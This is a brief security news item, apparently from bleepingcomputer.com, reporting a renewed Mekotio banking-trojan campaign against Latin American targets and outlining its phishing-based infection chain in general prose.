A new version of a banking trojan known as Mekotio is being deployed in the wild, with malware analysts reporting that it's using a new, stealthier infection flow. The last notable activity of Mekotio dates back to the summer of 2020 when the trojan's operators deployed it in a campaign targeting Latin American countries. The targeting scope appears to be the same in recent attacks, with Spanish being the language of choice for the phishing emails that start the infection chain.

The infection begins with a phishing email bundling a ZIP attachment containing an obfuscated batch script that fetches and executes a PowerShell script. Once the PowerShell script gets launched, it will download a second ZIP archive after some basic location and anti-analysis checks. If the checks confirm the victim is in Latin America and the malware isn't running on a virtual machine, the second ZIP, which contains the Mekotio payload in DLL form, is extracted.

Source: bleepingcomputer.com